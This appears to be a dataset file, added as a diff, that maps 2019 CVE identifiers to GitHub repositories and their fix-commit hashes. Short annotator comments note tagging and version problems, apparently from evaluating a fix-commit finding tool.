+CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; commit timestamp is outside the time interval +CVE-2019-10641;https://github.com/contao/contao;None:None;False;b92e27bc7c9e59226077937f840c74ffd0f672e8,74c7dfafa0dfa5363a9463b486522d5d526e28fe; +CVE-2019-10642;https://github.com/contao/contao;None:None;False;ee2c8130c2e68a1d0d2e75bd6b774c4393942b15; +CVE-2019-10643;https://github.com/contao/contao;None:None;False;70348cc812b110831ad66a4f9857883f75649b88; missing exact subversions (says only 4.7) +CVE-2019-10682;https://github.com/relekang/django-nopassword;None:None;False;d8b4615f5fbfe3997d96cf4cb3e342406396193c; +CVE-2019-10745;https://github.com/jonschlinkert/assign-deep;None:None;False;90bf1c551d05940898168d04066bbf15060f50cc; commit has no tags +CVE-2019-10748;https://github.com/sequelize/sequelize;None:None;False;a72a3f50bad7772ce96fc62d80f64b109fb2893f; +CVE-2019-10749;https://github.com/sequelize/sequelize;None:None;False;ee4017379db0059566ecb5424274ad4e2d66bc68; +CVE-2019-10750;https://github.com/alexindigo/deeply;None:None;False;6eccb2f03ec8d3eefc6805053c4cc2a36aab1505; +CVE-2019-10751;https://github.com/httpie/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; Repo changed in the meantime +CVE-2019-10752;https://github.com/sequelize/sequelize;None:None;False;9bd0bc111b6f502223edf7e902680f7cc2ed541e; +CVE-2019-10754;https://github.com/apereo/cas;None:None;False;40bf278e66786544411c471de5123e7a71826b9f; commit timestamp is outside the time interval +CVE-2019-10756;https://github.com/node-red/node-red-dashboard;None:None;False;870382792f679b0a6bbf45b29ca7f6428e51623b; +CVE-2019-10757;https://github.com/knex/knex;None:None;False;988fb243898d746a759d422762685a79eddf99ca; +CVE-2019-10760;https://github.com/commenthol/safer-eval;None:None;False;1c29f6a6e304fb650c05056e217e457a0d2cc3c5; +CVE-2019-10762;https://github.com/catfan/Medoo;None:None;False;659864b393961bf224bba1efc03b7dcbed7de533; +CVE-2019-10763;https://github.com/pimcore/pimcore;None:None;False;9182f03c80bb7f08aae4efd4a0788e2be6368d96,608ef5d81ba34d034c9b70519bbc6806ad115d68; +CVE-2019-10764;https://github.com/simplito/elliptic-php;None:None;False;15652609aa55968d56685c2a9120535ccdc00fd9; +CVE-2019-10766;https://github.com/usmanhalalit/pixie;None:None;False;9bd991021abbcbfb19347a07dca8b7e518b8abc9,747dd46a967de4e9a944c56f7597e2a2378829c6; +CVE-2019-10767;https://github.com/ioBroker/ioBroker.js-controller;None:None;False;f6e292c6750a491a5000d0f851b2fede4f9e2fda; +CVE-2019-10768;https://github.com/angular/angular.js;None:None;False;add78e62004e80bb1e16ab2dfe224afa8e513bc3,e242e9b5952edcb5c362b80e77a30379d565cf8f,726f49dcf6c23106ddaf5cfd5e2e592841db743a; +CVE-2019-10770;https://github.com/ratpack/ratpack;None:None;False;c1d4357bbc4bceb24abb156fbb471257a0177eb6,a3cbb13be1527874528c3b99fc33517c0297b6d3; +CVE-2019-10771;https://github.com/ioBroker/ioBroker.web;None:None;False;24ebb6d3714feac87570ce7a2e827fd2f91aa043; +CVE-2019-10773;https://github.com/yarnpkg/yarn;None:None;False;039bafd74b7b1a88a53a54f8fa6fa872615e90e7,8cd85c9c463fb75df0621fc256126dca169bdc3f,85d8d79892e967f6529716a05cb4a9bc9769f811,ef69693037865be3389ac470de8a4891ec4faf18,35a884ec448b4cad193feb08aa9ff20e7397894d,752ce39e0de09df42f17dc982b18f91c8130e613,cefe4c529816f94cfefbb78c1b0d16d7da895b64; +CVE-2019-10774;https://github.com/mikehaertl/php-shellcommand;None:None;False;8d98d8536e05abafe76a491da87296d824939076,c2ef7dbdb38a0a477394975097655c00adec97c4; +CVE-2019-10776;https://github.com/kellyselden/git-diff-apply;None:None;False;106d61d3ae723b4257c2a13e67b95eb40a27e0b5; +CVE-2019-10777;https://github.com/awspilot/cli-lambda-deploy;None:None;False;0985a18bffb265817bc84836c9a65f2bb04a51ac; +CVE-2019-10778;https://github.com/guybedford/devcert;None:None;False;571f4e6d077f7f21c6aed655ae380d85a7a5d3b8; +CVE-2019-10780;https://github.com/inukshuk/bibtex-ruby;None:None;False;14406f4460f4e1ecabd25ca94f809b3ea7c5fb11; +CVE-2019-10781;https://github.com/schema-inspector/schema-inspector;None:None;False;345a7b2eed11bb6128421150d65f4f83fdbb737d; +CVE-2019-10787;https://github.com/Turistforeningen/node-im-resize;None:None;False;de624dacf6a50e39fe3472af1414d44937ce1f03; +CVE-2019-10792;https://github.com/diegohaz/bodymen;None:None;False;5d52e8cf360410ee697afd90937e6042c3a8653b; +CVE-2019-10793;https://github.com/rhalff/dot-object;None:None;False;f76cff5fe6d01d30ce110d8f454db2e5bd28a7de; +CVE-2019-10795;https://github.com/remy/undefsafe;None:None;False;f272681b3a50e2c4cbb6a8533795e1453382c822; +CVE-2019-10797;https://github.com/wso2/transport-http;None:None;False;4a4dc99c7b259646ee5e23b7aaa7c3a8bac959c1; my bad i used two times 6.3.1 +CVE-2019-10799;https://github.com/eiskalteschatten/compile-sass;None:None;False;d9ada7797ff93875b6466dea7a78768e90a0f8d2; +CVE-2019-10806;https://github.com/vega/vega;None:None;False;27881f21af7d51fe0dc2fdbd92eabd34974310f1,8f33a0b5170d7de4f12fc248ec0901234342367b; +CVE-2019-10867;https://github.com/pimcore/pimcore;None:None;False;38a29e2f4f5f060a73974626952501cee05fda73; +CVE-2019-10874;https://github.com/bolt/bolt;None:None;False;127434d79990b54abfb3e830243deaf725baa4de,91187aef36363a870d60b0a3c1bf8507af34c9e4; +CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; +CVE-2019-10912;https://github.com/symfony/symfony;None:None;False;4fb975281634b8d49ebf013af9e502e67c28816b,d140648929b296ee5b27cbcf407672b3ae3980dc,4b18b32133d889cce605aa15242251bf485895de,b224d4f012dbd8c53cecb22254642e7e1fb70f40,d77e44569785329702ea55ead8938776080989b7; +CVE-2019-11016;https://github.com/Elgg/Elgg;None:None;False;482d19801fc0149f8605604415e90e69333c6347,bd194d1baa89ca271411b74569bcd806b9fa62e6; +CVE-2019-11082;https://github.com/dkpro/dkpro-core;None:None;False;6bdca97de39983083e400cb8715c019fe508b912,ceb749a82e15dc538793ae3fa0c06826dadbde24,0d7048e7130ddc901445281b777207d97f74e664,b7ab1ed62466fbbb852f8c97bdb888e2be10c2eb,0371975bab12f8f94e2f3c655922a360c76b7519,9c4c5d579355d2f9c5dc16eade0bc046be233035; +CVE-2019-11244;https://github.com/kubernetes/kubernetes;None:None;False;730bc968b95842022c4c81d607bf6411b459a675,f228ae3364729caed59087e23c42868454bc3ff4,b83756b3181f464720bfb468a171a58fc110c3e8,f6cee7a330a3b6f67701da4d0e76e65aa02a9159,4ccdc8b71b2790b2853b3ac43cdda623f8b22b12,6e4df6a7f27ecadbdec06fe92d915faabee33300,211b1ada57ae0b85dd08c4c353c90305fa1f14c9,8bebb336d0dfa07c70f92ca81fd88986d2a3192b; fixed version is vulnerable +CVE-2019-11245;https://github.com/kubernetes/kubernetes;None:None;False;7d58a4985dc157952a4f38f544a80ce4bf019471,9bba83f2c2e3a2432943fc2ee987cb7f264d9449,6c1b3b4f623b35a11a298194810078f4093c13f2,02026415cdc49b4ceb1b70e0410a93b57885851e,78254d555a2958483780818ac83f899ff9aa6296,91e593546c8396d6b764ff0832483411f5a3f3d3; example-case of uselesness of prospector, the issue mentioned in the advisory leads to all the right commits +CVE-2019-11269;https://github.com/spring-projects/spring-security-oauth;None:None;False;cb714f4cee45ce2807320ded38ed0bee846f2397,346bb74d28d7292afa30ce538c68cabc51d91777,1434dcf0c731dd1ee50d52520b1e24c15eb1f009,f769ff98c7b0c7aba42dd67538f6912c8e0d2ef7; +CVE-2019-11272;https://github.com/spring-projects/spring-security;None:None;False;b2d4fec3617c497c5a8eb9c7e5270e0c7db293ee; +CVE-2019-11289;https://github.com/cloudfoundry/gorouter;None:None;False;b1b5c44e050f73b399b379ca63a42a2c5780a83f; +CVE-2019-11325;https://github.com/symfony/symfony;None:None;False;d446d7733abd8807ff43e7a689065e6ebc48e32a,0524868cbf3d3a36e0af804432016d5a6d98169a; +CVE-2019-11328;https://github.com/hpcng/singularity;None:None;False;b4dcb0e4d77baa1c7647a4a5705ea824bb4e0dca; vulnerable tag is fixed +CVE-2019-11358;https://github.com/jquery/jquery;None:None;False;753d591aea698e57d6db58c9f722cd0808619b1b; +CVE-2019-11405;https://github.com/OpenAPITools/openapi-generator;None:None;False;cce35d75a4e69d09ec81ff1ece637d39b0f6f00e,54d9c19c7707285d7b3f9749762a5cf1a9c4336c; +CVE-2019-11458;https://github.com/cakephp/cakephp;None:None;False;1a74e798309192a9895c9cedabd714ceee345f4e,c25b91bf7c72db43c01b47a634fd02112ff9f1cd,81412fbe2cb88a304dbeeece1955bc0aec98edb1,2434f9ba4740759bf10947fbb5d3ebccce8e5cb9; +CVE-2019-11470;https://github.com/ImageMagick/ImageMagick;None:None;False;e3cdce6fe12193f235b8c0ae5efe6880a25eb957,fedaa752e53f37258139fcc8802aad426f111bc0; +CVE-2019-11512;https://github.com/contao/contao;None:None;False;87d92f823b08b91a0aeb522284537c8afcdb8aba; +CVE-2019-11514;https://github.com/flarum/core;None:None;False;66607a56749339d50620b049701ad4d6a4dafbd7; +CVE-2019-11767;https://github.com/phpbb/phpbb;None:None;False;dc5a167c429a3813d66b0ae3d14242650466cac6; +CVE-2019-11768;https://github.com/phpmyadmin/phpmyadmin;None:None;False;c1ecafc38319e8f768c9259d4d580e42acd5ee86; +CVE-2019-11777;https://github.com/eclipse/paho.mqtt.java;None:None;False;a0bbf1e7da158ae191582f032343c6171e6a0b44; +CVE-2019-11808;https://github.com/ratpack/ratpack;None:None;False;7b2f09eeeba1e460ad8702930a8a8933a2dbe1e9,f2b63eb82dd71194319fd3945f5edf29b8f3a42d; +CVE-2019-12041;https://github.com/jonschlinkert/remarkable;None:None;False;30e2bf05c12bbb12f04ffa0544df475d1ccc18d2,287dfbf22e70790c8b709ae37a5be0523597673c; +CVE-2019-12086;https://github.com/FasterXML/jackson-databind;None:None;False;d30f036208ab1c60bd5ce429cb4f7f1a3e5682e8,efc3c0d02f4743dbaa6d1b9c466772a2f13d966b,dda513bd7251b4f32b7b60b1c13740e3b5a43024; +CVE-2019-12203;https://github.com/silverstripe/silverstripe-framework;None:None;False;a6763298fef6b876597c3170c7aef710a62bb55c,eccfa9b10d246d741de2fa83d502339d45068983,569237c0f4d16ac6f927aeb0ed8c9b8787490080,a86093fee6398881889d6d330a15f7042be25bff; fixed version is vulnerable +CVE-2019-12245;https://github.com/silverstripe/silverstripe-assets;None:None;False;1df69c4a4d6258ebe5c4030fd7c78c6a75e94167,73e0cc69dc499c24aa706af9eddd8a2db2ac93e0; wrong advisory version +CVE-2019-12277;https://github.com/blogifierdotnet/Blogifier;None:None;False;3e2ae11f6be8aab82128f223c2916fab5a408be5; +CVE-2019-12308;https://github.com/django/django;None:None;False;c238701859a52d584f349cce15d56c8e8137c52b,deeba6d92006999fee9adfbd8be79bf0a59e8008,afddabf8428ddc89a332f7a78d0d21eaf2b5a673,09186a13d975de6d049f8b3e05484f66b01ece62; +CVE-2019-12313;https://github.com/dollarshaveclub/shave;None:None;False;1876911e423c00fdda643ef724d956b3d324d5c2,da7371b0531ba14eae48ef1bb1456a3de4cfa954; +CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;8a473397d5cdecff38b95a94fc7fc75dd06217dc,6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; The nvd advisory links a commit having the cve in the message but the oldest tag is twisted-19.7.0 +CVE-2019-12402;https://github.com/apache/commons-compress;None:None;False;4ad5d80a6272e007f64a6ac66829ca189a8093b9; +CVE-2019-12404;https://github.com/apache/jspwiki;None:None;False;d71ecf657ef3366f1790d9f09364812c78f7f8c2; +CVE-2019-12405;https://github.com/apache/trafficcontrol;None:None;False;f780aff77a52d52a37b4d1cc3e8e801c0b557356,54f105dfd6069945ec12c89d965532e6f5185935; +CVE-2019-12407;https://github.com/apache/jspwiki;None:None;False;f43ac386c8cd3e5fed7069e8fc8286668c86b5f8; +CVE-2019-12418;https://github.com/apache/tomcat;None:None;False;a91d7db4047d372b2f12999d3cf2bc3254c20d00,1fc9f589dbdd8295cf313b2667ab041c425f99c3,bef3f40400243348d12f4abfe9b413f43897c02b; +CVE-2019-12419;https://github.com/apache/cxf;None:None;False;6bf89927d3e07197d49453b00d673eadce696cf9,db6069667708a59c75a785f310d4a2df3698122c,661c271f4890b05896eee5de9cb8fb503fb3bccb; +CVE-2019-12422;https://github.com/apache/shiro;None:None;False;44f6548b97610cdf661976969d5735c0be14a57b,a8018783373ff5e5210225069c9919e071597d5e; +CVE-2019-12423;https://github.com/apache/cxf;None:None;False;8b40fdba289c62f4defae51c1f76860f0159c441,2de7e14eb95626fffef6f61365186de9a1c9de3d; +CVE-2019-12616;https://github.com/phpmyadmin/phpmyadmin;None:None;False;015c404038c44279d95b6430ee5a0dddc97691ec; +CVE-2019-12617;https://github.com/silverstripe/silverstripe-framework;None:None;False;8b7063a8e2773e2bbec3cabf94ed86e11f607071,5af205993d24b4bafc00dea94efc2c31305bca83; fixed version is vulnerable +CVE-2019-12741;https://github.com/hapifhir/hapi-fhir;None:None;False;8f41159eb147eeb964cad68b28eff97acac6ea9a; +CVE-2019-12748;https://github.com/TYPO3/TYPO3.CMS;None:None;False;4c003f80b8b25def173268b8b069446c4fcc313a,96105753aa6a61397ea47dc6fbe23f1f994fe32e,6dcbf981f89bed5826e3e284e0441d8e3a50bae6; +CVE-2019-12781;https://github.com/django/django;None:None;False;54d0f5e62f54c29a12dd96f44bacd810cbe03ac8,77706a3e4766da5d5fb75c4db22a0a59a28e6cd6,32124fc41e75074141b05f10fc55a4f01ff7f050,1e40f427bb8d0fb37cc9f830096a97c36c97af6f; +CVE-2019-12814;https://github.com/FasterXML/jackson-databind;None:None;False;5f7c69bba07a7155adde130d9dee2e54a54f1fa5; +CVE-2019-13127;https://github.com/jgraph/mxgraph;None:None;False;76e8e2809b622659a9c5ffdc4f19922b7a68cfa3; +CVE-2019-13135;https://github.com/ImageMagick/ImageMagick;None:None;False;cdb383749ef7b68a38891440af8cc23e0115306d; +CVE-2019-13173;https://github.com/npm/fstream;None:None;False;6a77d2fa6e1462693cf8e46f930da96ec1b0bb22; +CVE-2019-13209;https://github.com/rancher/rancher;None:None;False;0ddffe484adccb9e37d9432e8e625d8ebbfb0088; +CVE-2019-13295;https://github.com/ImageMagick/ImageMagick;None:None;False;a7759f410b773a1dd57b0e1fb28112e1cd8b97bc; +CVE-2019-13574;https://github.com/minimagick/minimagick;None:None;False;4cd5081e58810d3394d27a67219e8e4e0445d851; +CVE-2019-13644;https://github.com/firefly-iii/firefly-iii;None:None;False;def307010c388c4e92d7066671ad62e477cc087a; advisory link is a first uncomplete fix +CVE-2019-14262;https://github.com/drewnoakes/metadata-extractor-dotnet;None:None;False;c9a8a9ac4376725084bd7c3c11af50c74cf58d44,3142e5e6a95f2760ace1d2fdd9d50a97eb1c0e23; +CVE-2019-14280;https://github.com/craftcms/cms;None:None;False;7e7b9756da942d70b930a5e9a8ea4767f3920d00,a3844e019bbc3c67a2f9ba581a758d785efa9e26; +CVE-2019-14537;https://github.com/YOURLS/YOURLS;None:None;False;9e36c67b01b932a41f0834d7896c7ba8383e9f07; +CVE-2019-14540;https://github.com/FasterXML/jackson-databind;None:None;False;d4983c740fec7d5576b207a8c30a63d3ea7443de; +CVE-2019-14668;https://github.com/firefly-iii/firefly-iii;None:None;False;3ad4e04e2ae50e60564b60b68dfac083e5684882; +CVE-2019-14669;https://github.com/firefly-iii/firefly-iii;None:None;False;2ddf48f15cbdbb475221c299872420f625c3bc3f; +CVE-2019-14671;https://github.com/firefly-iii/firefly-iii;None:None;False;e80d616ef4397e6e764f6b7b7a5b30121244933c; +CVE-2019-14672;https://github.com/firefly-iii/firefly-iii;None:None;False;8717f469b10e9f7e1547c6f70f7d24e1359d28d4; +CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; +CVE-2019-14806;https://github.com/pallets/werkzeug;None:None;False;00bc43b1672e662e5e3b8cecd79e67fc968fa246; +CVE-2019-14837;https://github.com/keycloak/keycloak;None:None;False;9a7c1a91a59ab85e7f8889a505be04a71580777f; +CVE-2019-14838;https://github.com/wildfly/wildfly-core;None:None;False;2d527803dc10add8806fa0dd66f409dc511f92ec,131fa6880ae1523fac9e96df54dc394b63b0eed3,80e18b46f73f9d061d4150c66e6dc2fc1fd0bc41; had to look for tags manually (commits have no tags) +CVE-2019-14862;https://github.com/knockout/knockout;None:None;False;7e280b2b8a04cc19176b5171263a5c68bda98efb; +CVE-2019-14863;https://github.com/angular/angular.js;None:None;False;f33ce173c90736e349cf594df717ae3ee41e0f7a; +CVE-2019-14892;https://github.com/FasterXML/jackson-databind;None:None;False;819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b,41b7f9b90149e9d44a65a8261a8deedc7186f6af; +CVE-2019-14893;https://github.com/FasterXML/jackson-databind;None:None;False;998efd708284778f29d83d7962a9bd935c228317; +CVE-2019-14933;https://github.com/bagisto/bagisto;None:None;False;6a4cb016c4b1fa218c86b19b944fe88cab89c82d,747f2147396acb5e9477431e6847a7cf82e62614,e88bf10c55ee6ad89c0a81ad539ca9695aaa9999,09d6afc72aa055a389139f14e3d643927cea7501,61fd02ed576c4588dd72757da8e59fe1697a76e9,1e6579bedff68ab22f9160c2f4a0b7f4cbc9de60,d8d645eb4122a951ac89c3cbe6086b33a4707a2a,8cfcf3d4844bbc58623c02fab6da9bb1a1d619d3,6c74b2ca4269ac62f051d0a5a50a3ec8070c988c,c7482f576ec79b3c03119239b35c8b4c75a8e0a3,5c94a8a21fb0c79886975e4c489eecc131a9939f,1033bd8d315c47b95042a16b5b3b79fb17a796e5,82e56334c29d40ae66b9f74415962d8cdec86fcd,2df1a84191eb0cb67c5514e4fbbe936ef6883067,dadbf2bd6aa32c66a74028643c72a9e71b7fc314; +CVE-2019-14980;https://github.com/ImageMagick/ImageMagick;None:None;False;c5d012a46ae22be9444326aa37969a3f75daa3ba; +CVE-2019-15062;https://github.com/Dolibarr/dolibarr;None:None;False;18eb2a83fe7c2d01bdb34cceec389a6f9541e1f6,9692ea5faf2ef69bec7328feda1a23092ce55143,d21e5571007d2052a6b5f80a67b6f4cac693584a; vulnerable tag is fixed +CVE-2019-15477;https://github.com/jooby-project/jooby;None:None;False;27b4af283de1a2c2a6b0530039b46eef75ddf655,34856a738829d8fedca4ed27bd6ff413af87186f,395dab7e80474ac0c2c32d81f61cda2c8331a46b; +CVE-2019-15481;https://github.com/kevinpapst/kimai2;None:None;False;a0e8aa3a435717187fb12210242dab1b7c97ff3f; +CVE-2019-15482;https://github.com/SLMNBJ/selectize-plugin-a11y;None:None;False;99c14f7644fdfc815625d7b54829e6c2dca31a8b,927d81e9ea86acac1724d57b2ce9f3c962fd34c4; +CVE-2019-15483;https://github.com/bolt/bolt;None:None;False;7910ea8443377bf661ac49a80015eb25f69cdfd5,45780faa7ee5263a5a5ca4cfe102830ef244b06a; +CVE-2019-15484;https://github.com/bolt/bolt;None:None;False;2634a56c0db25a6a7e917a78ab8f9fc430f03a51,520c4578acfd0193b08cabd924598e6dd0edf98f; +CVE-2019-15485;https://github.com/bolt/bolt;None:None;False;1ef623734b555fc5dbcd6d735cf2ecf8b2d22cd1,bd7e9393f24ef162e354b28b82b85d1865d6c0e8; +CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;a3b57d1e4424e2fadabcd526d170c4868d55159c,78d6aff2276f2d341f643b095515f8aaba5e67c2; +CVE-2019-15532;https://github.com/gchq/CyberChef;None:None;False;01f0625d6a177f9c5df9281f12a27c814c2d8bcf; +CVE-2019-15587;https://github.com/flavorjones/loofah;None:None;False;0c6617af440879ce97440f6eb6c58636456dc8ec,e323a776dd2755a837a67895eaa3cdae44495254; wrong cve id in linked issue... +CVE-2019-15599;https://github.com/pkrumins/node-tree-kill;None:None;False;ff73dbf144c4c2daa67799a50dfff59cd455c63c,deee138a8cbc918463d8af5ce8c2bec33c3fd164; +CVE-2019-15608;https://github.com/yarnpkg/yarn;None:None;False;34efd23305b9da701aae96f29302b71a5a0ea2e6,fa746451eeae79ec35e87bbec14576d6831984fe; +CVE-2019-15657;https://github.com/mysticatea/eslint-utils;None:None;False;08158db1c98fd71cf0f32ddefbc147e2620e724c; +CVE-2019-15658;https://github.com/voxpelli/node-connect-pg-simple;None:None;False;df61c9507f804ba72803e4f567c3cbcfa0a9d7e1; +CVE-2019-15782;https://github.com/webtorrent/webtorrent;None:None;False;7e829b5d52c32d2e6d8f5fbcf0f8f418fffde083,22546df6d9ba9ca4523142d98b5e70f6db213f3e,cdf1159cc0227b1f85c4a52263cbd33bc4ed5242,9029557ca3d22faef67315f8ed33df295ce6d59e; +CVE-2019-16060;https://github.com/airbrake/airbrake-ruby;None:None;False;d29925e7838031bf7dea7016b22de52532503796,45b1306590c345ed798f3290d32eb1deb38b9945; +CVE-2019-16097;https://github.com/goharbor/harbor;None:None;False;290da4dc7bd11532800c13cfa125b300231f76f4,1559c8ccd19ac6bd128d2cc91c4cc0b3ac4b35a2,7d151946e0e2d2b23ddb8f6ca2d16a9413acf7d9,b6db8a8a106259ec9a2c48be8a380cb3b37cf517; +CVE-2019-16145;https://github.com/padrino/padrino-contrib;None:None;False;85e087ef40cbc3c6244d5301b6d7da63ba1ade20,662616162265a74da5a35b55c10f85d8168fc635; commit has no tags, the commits appear in zero tags so we filter them out +CVE-2019-16197;https://github.com/Dolibarr/dolibarr;None:None;False;cabbdfc650a1f2b4f0fe04bf29bab0b3cfc2ee63; +CVE-2019-16317;https://github.com/pimcore/pimcore;None:None;False;6ee5d8536d0802e377594cbe39083e822710aab9; +CVE-2019-16318;https://github.com/pimcore/pimcore;None:None;False;732f1647cc6e0a29b5b1f5d904b4d726b5e9455f; +CVE-2019-16335;https://github.com/FasterXML/jackson-databind;None:None;False;73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db; +CVE-2019-16403;https://github.com/bagisto/bagisto;None:None;False;4a2efc8eee0b8cc2ce807288f06a843c8e10701b,06aa4dd6bf1569ec2f76fe49fb4cf177e24539e0,40ebb3a0c43ca8754ff5be46afdeb298ee91bd95; fixed version is vulnerable +CVE-2019-16676;https://github.com/heartcombo/simple_form;None:None;False;8c91bd76a5052ddf3e3ab9fd8333f9aa7b2e2dd6; +CVE-2019-16761;https://github.com/simpleledger/slp-validate.js;None:None;False;50ad96c2798dad6b9f9a13333dd05232defe5730; +CVE-2019-16762;https://github.com/simpleledger/slpjs;None:None;False;ac8809b42e47790a6f0205991b36f2699ed10c84; +CVE-2019-16763;https://github.com/mpetroff/pannellum;None:None;False;cc2f3d99953de59db908e0c6efd1c2c17f7c6914; +CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; +CVE-2019-16768;https://github.com/Sylius/Sylius;None:None;False;fd43ee5321668c0777aa2c023a88a613bd2b2d58,8b68ff784d16930c86266b0ab93d06ba9fd12a19,19b2fe4a6cdb2186489221ea8b5e5628c8223286,51dd1fe1a97b116507d1651591f91413411f1a86,e9bd800c25ed4a4f3580054df7019e965c57c4f5; +CVE-2019-16769;https://github.com/yahoo/serialize-javascript;None:None;False;16a68ab53d9626fc7c942b48a1163108fcd184c8; +CVE-2019-16770;https://github.com/puma/puma;None:None;False;98a1f03e5ebe40cf56b65b0bf60adf97057e0eaf,6baa4d8e1c88f2e4db2918df48416a5c49feec40,06053e60908074bb38293d4449ea261cb009b53e; +CVE-2019-16771;https://github.com/line/armeria;None:None;False;b597f7a865a527a84ee3d6937075cfbb4470ed20; +CVE-2019-16772;https://github.com/commenthol/serialize-to-js;None:None;False;181d7d583ae5293cd47cc99b14ad13352875f3e3,d0234d3a3cea6edaeb2c22df0d359164967234a2; +CVE-2019-16774;https://github.com/PHPSocialNetwork/phpfastcache;None:None;False;82a84adff6e8fc9b564c616d0fdc9238ae2e86c3,c4527205cb7a402b595790c74310791f5b04a1a4,34d680b18e79e9d7f0874a5a06d23371dc326b26,17f77676adfe1e0b24a139dcaa0586d283fbfcef; +CVE-2019-16778;https://github.com/tensorflow/tensorflow;None:None;False;db4f9717c41bccc3ce10099ab61996b246099892; +CVE-2019-16779;https://github.com/excon/excon;None:None;False;ccb57d7a422f020dc74f1de4e8fb505ab46d8a29; +CVE-2019-16782;https://github.com/rack/rack;None:None;False;7fecaee81f59926b6e1913511c90650e76673b38,3232f9370d099e784a16c01d32e8a2da4a953f18,15da2e5d95228d0b3fcdb38b2a562efc333402f0,1a532d13eee9d5546349b5253a204187773de151,b9565a90eea77960e552e3c86b0adb83ab034726,368effdbeca7955f4e46ea51bfb2d647bc79aa6b,d49aa811d6c8fe109c7fc5ca9bddb3d9f7eba796,3e9cb660cc8bf9543b134b6f3ca35aadfe4e0611,442dba2362558e4a7a3e39d437b95d81f2479b31,3ab0277cd129f15059662451718048bcf23cb5d1,7237b6661ad98c1dac6ad799192262697e1a3559,511f809e80c3264af3a26d485a5137ac28f08ebe,5b1cab667270d7ad1a4d2088adf5ff4eb9845496,1e96e0f197777458216bb3dfdbcce57a0bbba0c5,3ba123d278f1085ba78fc000df954e507af2d622,dc45a06b339c707c1f658c123ec7216151878f7a,73a5f79f6854eed81ecc3e5fb9f8154e967ccc49,4e322629e0c6698c75a3fb541a42571f8543c34c,1c7e3b259f0741c869dcfbabeb3e0670c4d3f848,2b205ed5a047d9e50a13bb7a411bc48745b515ec,bb3d486644755b2e0c7824b3910db1a83c98fcd2,77f3aab73089abe518f62c46268b104bacd7114b,83d4bd12c7e88455d21230bc24ec3a543654e2aa; +CVE-2019-16784;https://github.com/pyinstaller/pyinstaller;None:None;False;42a67148b3bdf9211fda8499fdc5b63acdd7e6cc; +CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; +CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; +CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; +CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; +CVE-2019-16869;https://github.com/netty/netty;None:None;False;39cafcb05c99f2aa9fce7e6597664c9ed6a63a95,017a9658c97ff1a1355c31a6a1f8bd1ea6f21c8d; +CVE-2019-16884;https://github.com/opencontainers/runc;None:None;False;3e425f80a8c931f88e6d94a8c831b9d5aa481657,331692baa7afdf6c186f8667cb0e6362ea0802b3; +CVE-2019-16942;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; +CVE-2019-16943;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; +CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1,f24212589b568c9f9ae11d4bf504f42303b341d5,748f60bafd857c24f65683426f665350e2c3f91b; +CVE-2019-17223;https://github.com/Dolibarr/dolibarr;None:None;False;c7736dde41826ac6eca3e838e57eab2f0304e256,8645fd8946eab2d2edb39ba7a3cf59282fa8b994; commit has no tags +CVE-2019-17267;https://github.com/FasterXML/jackson-databind;None:None;False;191a4cdf87b56d2ddddb77edd895ee756b7f75eb; +CVE-2019-17359;https://github.com/bcgit/bc-java;None:None;False;33a8e4aa07b21a8bcf5a582446664485f5f081b2,b1bc75254f5fea633a49a751a1a7339056f97856; +CVE-2019-17383;https://github.com/dspinhirne/netaddr-rb;None:None;False;3aac46c00a36e71905eaa619cb94d45bff6e3b51,f9639bd6e1d920cc46ff56ec11981536cb371c6b; +CVE-2019-17426;https://github.com/Automattic/mongoose;None:None;False;f3eca5b94d822225c04e96cbeed9f095afb3c31c,f88eb2524b65a68ff893c90a03c04f0913c1913e; +CVE-2019-17496;https://github.com/craftcms/cms;None:None;False;0ee66d29281af2b6c4f866e1437842c61983a672; +CVE-2019-17513;https://github.com/ratpack/ratpack;None:None;False;efb910d38a96494256f36675ef0e5061097dd77d; +CVE-2019-17531;https://github.com/FasterXML/jackson-databind;None:None;False;b5a304a98590b6bb766134f9261e6566dcbbb6d0; +CVE-2019-17541;https://github.com/ImageMagick/ImageMagick;None:None;False;39f226a9c137f547e12afde972eeba7551124493; +CVE-2019-17554;https://github.com/apache/olingo-odata4;None:None;False;c3f982db3d97e395d313ae8f231202bb2139882c,5948974ad28271818e2afe747c71cde56a7f2c63; +CVE-2019-17563;https://github.com/apache/tomcat;None:None;False;e19a202ee43b6e2a538be5515ae0ab32d8ef112c,1ecba14e690cf5f3f143eef6ae7037a6d3c16652,ab72a106fe5d992abddda954e30849d7cf8cc583; +CVE-2019-17569;https://github.com/apache/tomcat;None:None;False;b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,3c295d913e1d82ce25b4ad66c800313994f4e530,060ecc5eb839208687b7fcc9e35287ac8eb46998; +CVE-2019-17592;https://github.com/adaltas/node-csv-parse;None:None;False;b9d35940c6815cdf1dfd6b21857a1f6d0fd51e4a; 